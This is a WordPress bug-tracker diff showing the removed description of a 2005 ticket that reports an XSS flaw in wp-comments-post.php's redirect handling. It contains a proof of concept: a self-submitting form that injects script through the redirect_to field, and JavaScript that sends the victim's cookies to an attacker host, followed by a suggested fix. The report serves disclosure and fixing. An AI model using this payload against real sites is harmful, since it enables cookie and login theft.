WordPress.org
Get WordPress

Make WordPress Core

Changes between Initial Version and Version 3 of Ticket #1871


Ignore:
Timestamp:
11/13/2005 12:04:55 AM (21 years ago)
Author:
markjaquith
Comment:

Legend:

Unmodified
Added
Removed
Modified

  • Ticket #1871

    • Property Status changed from new to closed
    • Property Reporter ManiacSoftwareManiacsOrg deleted
    • Property Resolution changed from to invalid
    • Property Summary changed from XSS vulnerability through redirects to Redacted

  • Ticket #1871 – Description

    initial v3  
    1 On a russian blog today [http://weblog.netlux.org/archive/2005/wordpress-xss.html was discovered] an XSS vulnerability alowing attacker to get user's cookies with login and password.
    2 
    3 Here's a quick retranslation in english (since all russian-english automatic translators suck):
    4 
    5 blog.wp.com - attacked blog
    6 server.com - attackers server
    7 
    8 Attcker gives the link to this file to a victim (with victim's url and real comment id in comment_post_ID field):
    9 
    10 {{{
    11 <html>
    12     <body onLoad=document.forms["loginform"].submit()>
    13         <form name="loginform" id="loginform" action="http://blog.wp.com/wp-comments-post.php" method="post">
    14             <input type="hidden" name="comment_post_ID" value="1" />
    15             <input type="hidden" name="author" value="Wordpress-bug notifier" />
    16             <input type="hidden" name="email" value="xss@xss.xss" />
    17             <input type="hidden" name="url" value="http://ya.ru" />
    18             <input type="hidden" name="comment" value='Please fix xss-vulnerability on your Wopdpress blog engine.' />
    19             <textarea name="redirect_to" style="display: none;">
    20 
    21 Content-Type: text/html
    22 
    23 
    24 <html><body><script language=JavaScript src=http://server.com/js.js type=text
    25 /javascript></script><script>cook()</script><!--</textarea>
    26         </form>
    27     </body>
    28 </html>
    29 }}}
    30 
    31 This looks like an ordinary comment form which submits itself on page load. On submitting victim's browser executes JS-code from server.com/js.js:
    32 
    33 {{{
    34 function cook() {
    35     document.location = "http://server.com/log.php?" + document.cookie;
    36 }
    37 }}}
    38 
    39 which transfers victim's cookie to the attacker's server.
    40 
    41 This bug can be fixed by urlencoding redirect location in wp-comments-post.php on line 62:
    42 
    43 {{{
    44 wp_redirect(urlencode($location));
    45 }}}
     1Redacted